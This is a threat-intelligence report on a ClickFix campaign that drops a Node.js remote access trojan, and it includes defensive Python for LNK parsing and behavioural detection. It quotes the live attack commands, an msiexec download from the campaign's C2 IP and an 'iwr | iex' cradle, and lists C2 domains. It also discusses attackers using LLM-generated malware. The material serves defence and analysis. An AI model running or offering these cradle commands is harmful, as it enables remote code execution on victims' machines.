Managed Detection and Response
ClickFix to NodeJS RAT
An Ominous Sign
November 10, 2025 | 8 min read
Patrick McHale and Joshua Green


BlueVoyant’s Threat Fusion Cell (TFC) and Security Operations Center (SOC) have uncovered a cyber campaign that signals a concerning evolution in the threat landscape: the rise of the "LLM-Enabled Developer." In-depth analysis suggests the actor behind an ongoing ClickFix campaign leveraged publicly documented advanced attack chains, powered by AI-generated code, to deploy a less sophisticated, but capable Node.js RAT.
While the campaign utilizes the established KongTuke traffic direction system and ClickFix lures—tactics of mature threat groups—its execution is marked by developmental carelessness, revealing a lower-to-mid-tier actor focused on iteration over stealth. This report details how the weaponization of open-source threat intelligence, combined with accessible AI, is dramatically lowering the barrier to entry for high-impact cyber operations.
Attack Overview
The attack chain begins with a typical ClickFix lure, prompting the user to press Win+R, followed by Ctrl+V and the enter key, executing the malicious command line:
“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe $w=[wmiclass]'Win32_Process';$w.Create('msiexec /i http[:]//93[.]113[.]25[.]102/msi/e69378480adab23d /qn')”

Figure 1 – Sample ClickFix lure from campaign
This command line downloads and executes cloudflare-service.msi in memory, which fakes a .NET runtime error and executes an embedded PowerShell script run-script.ps1.

Figure 2 – Fake .NET error pop-up window
Then, the run-script.ps1 downloads and executes the next stage via the command line:
“iwr 'http[:]//93[.]113[.]25[.]102/779461502770a6d2' -UseBasicParsing | iex”
Hosted at “http://93[.]113[.]25[.]102/779461502770a6d2” is additional PowerShell that performs the following:
- Sends initial beacon to C2 indicating a newly compromised host
- Downloads and installs the official Node.js v22.16.0 runtime
- Downloads “index.js” from https[:]//amphetamine[.]kyun[.]li?cid=779461502770a6d2 and executes it with node

Figure 3 – PowerShell utilized to download and install first index.js payload
The initial index.js script is heavily obfuscated, which was likely done via the open-source JavaScript obfuscator at https[:]//obfuscator[.]io/. Thankfully, the threat actor was kind enough to leave the main() function unobfuscated, enabling BlueVoyant to quickly cut through ~7,000+ lines of nonfunctional JavaScript.
In our analysis, BlueVoyant researchers observed only a few purposeful helper functions, namely “hc”, “ClientRequestImpl”, “AddAutoRun”, and “runModule”. Functions “hc” and “ClientRequestImpl” are utilized to construct client-side functionality for interacting with a remote command and control (C2) domain. The “hc” function leverages ClientRequestImpl to construct and execute the underlying HTTP requests.
“AddAutoRun” adds a persistence mechanism on the compromised host, ensuring that a malicious .LNK file is added to the user’s Startup folder, and upon user login, will execute a hidden PowerShell window launching index.js from its installation directory via node.exe.

Figure 4 – Creation of .LNK persistence mechanism
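The Startup-folder .LNK persistence just described is something a responder can check for directly, because the shortcut's target, command-line arguments and window mode are all stored in the Shell Link binary format. The following script is an added example written for this article, not BlueVoyant's detection content and not code from the campaign: it parses the fields of a .LNK file that matter here (LinkInfo LocalBasePath, the StringData strings and ShowCommand), flags the combination of a PowerShell target, a hidden window and node.exe running a .js file from a user-writable path, and can walk the user's Startup folder. The sample shortcut bytes are constructed by the included builder, and every path in them is a placeholder rather than an artifact from the campaign.

```python
import os
import re
import struct

# Bits of ShellLinkHeader.LinkFlags and one ShowCommand value (MS-SHLLINK 2.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                      # window starts minimized and inactive
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return target path, ShowCommand and StringData fields of a .LNK file."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:         # skip the item ID list by its size
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:                   # LocalBasePath is a NUL-terminated ANSI string
        info_size, _, info_flags, _, base_off = struct.unpack_from("<IIIII", data, pos)
        if info_flags & 0x1:
            end = data.index(b"\x00", pos + base_off)
            target = data[pos + base_off:end].decode("latin-1")
        pos += info_size
    fields = {"target": target, "show_command": show_command}
    for bit, name in STRING_DATA:               # CountCharacters, then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    return fields


HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|programdata|users\\public|temp)\\", re.I)


def assess_startup_lnk(lnk: dict) -> list:
    """Flag the traits of the persistence shortcut described in the report."""
    blob = (lnk["target"] + " " + lnk.get("arguments", "")).lower()
    findings = []
    if "powershell" in blob and (HIDDEN_WINDOW.search(blob) or lnk["show_command"] == SW_SHOWMINNOACTIVE):
        findings.append("hidden PowerShell window")
    if "node" in blob and ".js" in blob:
        findings.append("node.exe launching a JavaScript file")
    if USER_WRITABLE.search(blob):
        findings.append("payload in a user-writable directory")
    return findings


def scan_startup_folder(folder=None) -> dict:
    """Parse every .lnk in the user's Startup folder; return only shortcuts with findings."""
    folder = folder or os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")
    results = {}
    for name in (sorted(os.listdir(folder)) if os.path.isdir(folder) else []):
        if name.lower().endswith(".lnk"):
            with open(os.path.join(folder, name), "rb") as fh:
                hits = assess_startup_lnk(parse_lnk(fh.read()))
            if hits:
                results[name] = hits
    return results


def build_lnk(target: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal Shell Link (header, LinkInfo, StringData) for offline testing."""
    flags = HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, show_command)
    header += struct.pack("<HHII", 0, 0, 0, 0)                      # HotKey and reserved fields
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # fixed drive, empty label
    base_path = target.encode("latin-1") + b"\x00"
    body = volume_id + base_path + b"\x00"                          # empty CommonPathSuffix
    base_off = 0x1C + len(volume_id)
    link_info = struct.pack("<IIIIIII", 0x1C + len(body), 0x1C, 0x1, 0x1C, base_off, 0,
                            base_off + len(base_path)) + body

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + link_info + string_data(target.rsplit("\\", 1)[-1]) + string_data(arguments)


# Constructed shortcuts: the first mirrors the reported persistence mechanism (all paths are
# placeholders, not campaign artifacts); the second is an ordinary application shortcut.
SUSPICIOUS_LNK = build_lnk(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"-WindowStyle Hidden -Command & 'C:\Users\user\AppData\Roaming\nodeapp\node.exe' "
    r"'C:\Users\user\AppData\Roaming\nodeapp\index.js'", SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"C:\Program Files\Example\Example.exe", "")

if __name__ == "__main__":
    print(assess_startup_lnk(parse_lnk(SUSPICIOUS_LNK)))
    print(scan_startup_folder())
```

Shortcuts written by scripting APIs usually also carry a LinkTargetIDList, which the parser skips by size; the target is taken from LinkInfo rather than from the ID list, which is enough for triage on a local drive. The three findings are deliberately behavioural (hidden window, node running a script, user-writable location) so the check survives the renamed directories and filenames this actor rotates through.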
The last helper function observed, “runModule”, dynamically loads a JavaScript module and executes that module's index.js by piping it into a Node.js child process, capturing the child's logs and returning its final exit code. This function determines whether the UAC bypass is necessary and whether it will be executed in main().
Upon execution of main(), we observed the download and execution of the final index.js payload. This final payload consists of 22,000+ lines of JavaScript and is capable of:
- Remotely execute PowerShell
- Load shellcode
- Restart processes with a UAC bypass
- Install and execute executables, DLLs, and MSI packages
- Dump Outlook
- Act as a SOCKS5 proxy
This index.js payload utilizes various API endpoints at http[:]//93[.]113[.]25[.]102/ to enable these capabilities.
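The chain above (a PowerShell one-liner creating msiexec through WMI, msiexec pulling a package from a URL, the MSI launching PowerShell with a download cradle, and node.exe running a script from the user's profile) is easier to detect as a sequence of behaviours than as a set of hashes or addresses. The following is an added example written for this article, not BlueVoyant's detection content: a handful of behavioural rules run over constructed process-creation events shaped like Sysmon Event ID 1 fields. The event dictionaries, the RFC 5737 address and the "PLACEHOLDER" path tokens are assumptions built for the demonstration; the one real-world fact relied on is that processes created via Win32_Process.Create have WmiPrvSE.exe as their parent.

```python
import re

# Constructed process-creation events shaped like Sysmon Event ID 1 fields. They mirror
# the chain described above; paths, the RFC 5737 test address and "PLACEHOLDER" path
# tokens are placeholders, not artifacts captured from the campaign.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "image": PS_EXE, "parent_image": r"C:\Windows\explorer.exe",            # Win+R lure
     "command_line": PS_EXE + r" $w=[wmiclass]'Win32_Process';$w.Create('msiexec /i http://198.51.100.7/msi/PLACEHOLDER /qn')"},
    {"id": 2, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",                         # WMI-created
     "command_line": r"msiexec /i http://198.51.100.7/msi/PLACEHOLDER /qn"},
    {"id": 3, "image": PS_EXE, "parent_image": r"C:\Windows\System32\msiexec.exe",    # embedded script
     "command_line": PS_EXE + " -Command \"iwr 'http://198.51.100.7/PLACEHOLDER' -UseBasicParsing | iex\""},
    {"id": 4, "image": r"C:\Users\user\AppData\Roaming\nodeapp\node.exe", "parent_image": PS_EXE,
     "command_line": r'"C:\Users\user\AppData\Roaming\nodeapp\node.exe" C:\Users\user\AppData\Roaming\nodeapp\index.js'},
    {"id": 5, "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"msiexec /i C:\Users\user\Downloads\app.msi"},                   # benign install
    {"id": 6, "image": r"C:\Program Files\nodejs\node.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js'},     # benign dev use
]

USER_WRITABLE = re.compile(r"\\(appdata|programdata|users\\public|temp)\\", re.I)


def _image_is(event, name):
    return event["image"].lower().endswith(name)


def _parent_is(event, name):
    return event["parent_image"].lower().endswith(name)


# Each rule names one behaviour from the chain rather than a hash, path or address.
RULES = [
    ("wmi_process_create_from_powershell", lambda e: _image_is(e, "powershell.exe")
     and re.search(r"\[wmiclass\].{0,40}win32_process.{0,80}\.create\(", e["command_line"], re.I)),
    ("msiexec_remote_package", lambda e: _image_is(e, "msiexec.exe")
     and re.search(r"/i\s+https?://", e["command_line"], re.I)),
    ("msiexec_spawned_by_wmi", lambda e: _image_is(e, "msiexec.exe") and _parent_is(e, "wmiprvse.exe")),
    ("powershell_spawned_by_msiexec", lambda e: _image_is(e, "powershell.exe") and _parent_is(e, "msiexec.exe")),
    ("powershell_download_cradle", lambda e: _image_is(e, "powershell.exe")
     and re.search(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b.*\|\s*(iex|invoke-expression)\b",
                   e["command_line"], re.I)),
    ("node_script_in_user_path", lambda e: _image_is(e, "node.exe")
     and re.search(r"\.js\b", e["command_line"], re.I) and USER_WRITABLE.search(e["command_line"])),
]


def match_rules(event):
    """Names of every rule the event triggers, in RULES order."""
    return [name for name, pred in RULES if pred(event)]


def triage(events):
    """Map event id -> matched rules, keeping only events that matched something."""
    return {e["id"]: hits for e in events if (hits := match_rules(e))}


def stages_seen(events):
    """Distinct behaviours observed on a host; several together point at the full chain."""
    return {name for e in events for name in match_rules(e)}


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, hits)
    print(len(stages_seen(SAMPLE_EVENTS)), "distinct stages")
```

On a real host the download cradle in run-script.ps1 would more often surface in PowerShell script block logging than on a process command line, so the same regular expression is worth applying to that channel as well; the rules are written against plain strings so they can be pointed at either source.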
A Sign of Things to Come...
BlueVoyant has tracked this ongoing cyber campaign since it began in early October and assesses that it likely exemplifies the evolving tactics of modern, lower-skilled threat actors, empowered by accessible technology. The operation begins with a ClickFix social engineering lure but distinguishes itself through the deployment of a sophisticated, modular Remote Access Trojan (RAT) written in Node.js.
The attack chain is consistent with previously documented ClickFix attacks, which BlueVoyant continuously encounters. A user is tricked into pasting a command that fetches a malicious MSI installer from the static C2 IP 93[.]113[.]25[.]102. This MSI file, disguised behind a fake .NET error, executes a PowerShell script that beacons to the C2, installs the official Node.js runtime, and ultimately executes the obfuscated RAT. The core payload establishes persistence via a Startup folder LNK file and provides a full suite of capabilities, including remote code execution, SOCKS5 proxying, and UAC bypass.
Analysis of the campaign's infrastructure and artifacts reveals a threat actor deeply entrenched in a rapid development and testing cycle. The list of downloaded MSI files—including cloudflare-service.msi, GearUP-2.48.1-win.msi, test-vt.msi, and vt-test.msi—tells a story of iterative testing and evasion refinement. The use of legitimate-sounding names like node-v22.19.0-x64.msi and cloudflare-turnstile.msi shows a strategic effort at social engineering, while the blatant test-vt.msi filename may indicate active and somewhat careless testing against security scanners like VirusTotal.
This developer-centric focus is further evidenced by the actor's infrastructure choices. While relying on a single, hard-coded C2 IP, they employ a variety of alphanumeric paths (e.g., /779461502770a6d2) for payload retrieval and have begun experimenting with additional lure-echoing domains (cloudflare-svc.kyun.li, cloudflare.kyun.li) alongside the primary domains leveraged earlier in the campaign (amphetamine.kyun.li, methadone.kyun.li).
A revealing aspect of the actor's profile is found within the code itself. The malware is heavily obfuscated with a public tool (obfuscator[.]io), yet key function names were left exposed, indicating a developmental oversight. More significantly, the scripts are filled with verbose, explanatory comments in Russian, such as “Ждем завершения других процессов CMSTP” (“Waiting for other CMSTP processes to complete”) and “# Альтернативный подход - использовать случайную задержку” (“# An alternative approach is to use a random delay”). This pattern of over-explanation, coupled with extensive debugging console logs, is a known signature of LLM-generated code.
BlueVoyant, therefore, assesses with medium confidence that this campaign is operated by a Russian-speaking threat actor, but that’s not the full story. In fact, this actor may represent a new class of "LLM-Enabled Developer"—those possessing the foundational knowledge to orchestrate a complex attack chain and implement AI-generated code but lack the advanced tradecraft of a seasoned malware author. Their reliance on public tools, iterative testing practices, and poor OPSEC (e.g., a static C2 IP, revealing filenames) points to a primary focus on functionality and evasion over long-term stealth.
In arriving at this conclusion, BlueVoyant's analysis found that this campaign potentially represents an operational extension of previously documented Node.js-based threat activity publicly reported by Sekoia TDR, Red Canary, and Trustwave researchers. Like the attacks and malware described there, this campaign also integrates the established KongTuke traffic direction system to funnel victims from compromised websites to the ClickFix landing pages. Furthermore, the core objective and final payload remain consistent: the deployment of a sophisticated Node.js-based RAT capable of remote execution, SOCKS5 proxying, and data exfiltration.
BlueVoyant’s investigation, however, reveals that this specific intrusion represents a distinct, parallel branch of development by a different threat actor. The key divergence occurs after the KongTuke redirection. Instead of the previously seen PowerShell commands fetching a ZIP file, this campaign executes a unique command to download a malicious MSI installer from a static, hard-coded IP (93[.]113[.]25[.]102), which then presents a fake .NET error. Furthermore, while persistence is maintained, the method shifts from the mature actor's consistent use of a Windows Registry Run key to a less stealthy .LNK file in the Startup folder.
The most telling differences lie in the code itself and in operational security, where this campaign exhibits the hallmarks of an “LLM-enabled developer”. The JavaScript is heavily obfuscated with a public tool yet contains exposed function names and verbose comments in Russian. Additionally, the infrastructure shows evidence of careless testing (e.g., test-vt.msi), and the actor relies on a single static C2 IP. This contrasts sharply with the sophisticated, evolving infrastructure and robust anti-analysis checks highlighted in the aforementioned research.
The documented success of such attacks in open-source research may have been the rationale for copying their work. The TTPs may have provided a complete blueprint for a copy-cat Node.js-based intrusion, a blueprint perfectly suited for AI-powered mimicry. The consistency of this modular process—from initial redirect to final RAT capabilities—makes it an ideal template for an LLM. A threat actor could feed these reports to an AI to automatically generate new, polymorphic variants of each stage, creating functionally identical malware that replicates this proven, successful attack chain. This pattern suggests the mature TTPs of established and/or successful threat groups are likely serving as a veritable recipe book for a new wave of LLM-enabled actors, who can effectively clone the functional components of a sophisticated attack while introducing operational noise that obscures their origins and complicates attribution.
Conclusion
This campaign exemplifies a significant shift in the cyber threat landscape, where the barrier to entry for conducting sophisticated attacks continues to lower rapidly. This operation is not a product of a top-tier, state-sponsored actor but rather the likely output of an "LLM-Enabled Developer"—a lower-to-mid-tier threat actor leveraging publicly documented techniques and AI-generated code to bootstrap their capabilities. By replicating the proven KongTuke-to-NodeJS-RAT kill chain, this actor demonstrates how open-source threat reporting can be weaponized, providing a blueprint for less skilled adversaries to emulate.
A fundamental takeaway is that the playbook is now publicly accessible to the layperson. The meticulous analyses published by the cybersecurity community, intended to illuminate and defend against threats, may conversely provide a step-by-step guide for aspiring malware authors. When this detailed playbook is combined with the power of LLMs, the result is a dangerous proliferation of capable threats. Vigilance against these underlying TTPs, rather than their constantly changing implementations, is the most effective defense against this new era of AI-powered, copycat threats.
For organizations seeking to defend against this evolving threat, several key takeaways emerge. First, user awareness remains a critical first line of defense. Continuous training on social engineering tactics, specifically the hallmarks of ClickFix lures (e.g., prompts to press Win+R and paste commands), is essential to disrupt the initial infection chain. Second, technical controls must evolve from hunting static indicators to detecting behavioural patterns. To aid this effort, BlueVoyant has developed advanced detection content designed to identify TTPs used in this campaign. Finally, the security community must recognize the dual edge of transparency. While vital for collective defense, detailed public reporting provides a template for adversaries to fast-track successful attacks via the use of LLMs; this necessitates a proactive hunting posture focused on TTPs and a mature assumption that proven attack chains will be rapidly adopted and adapted by the emerging generation of LLM-enabled threat actors.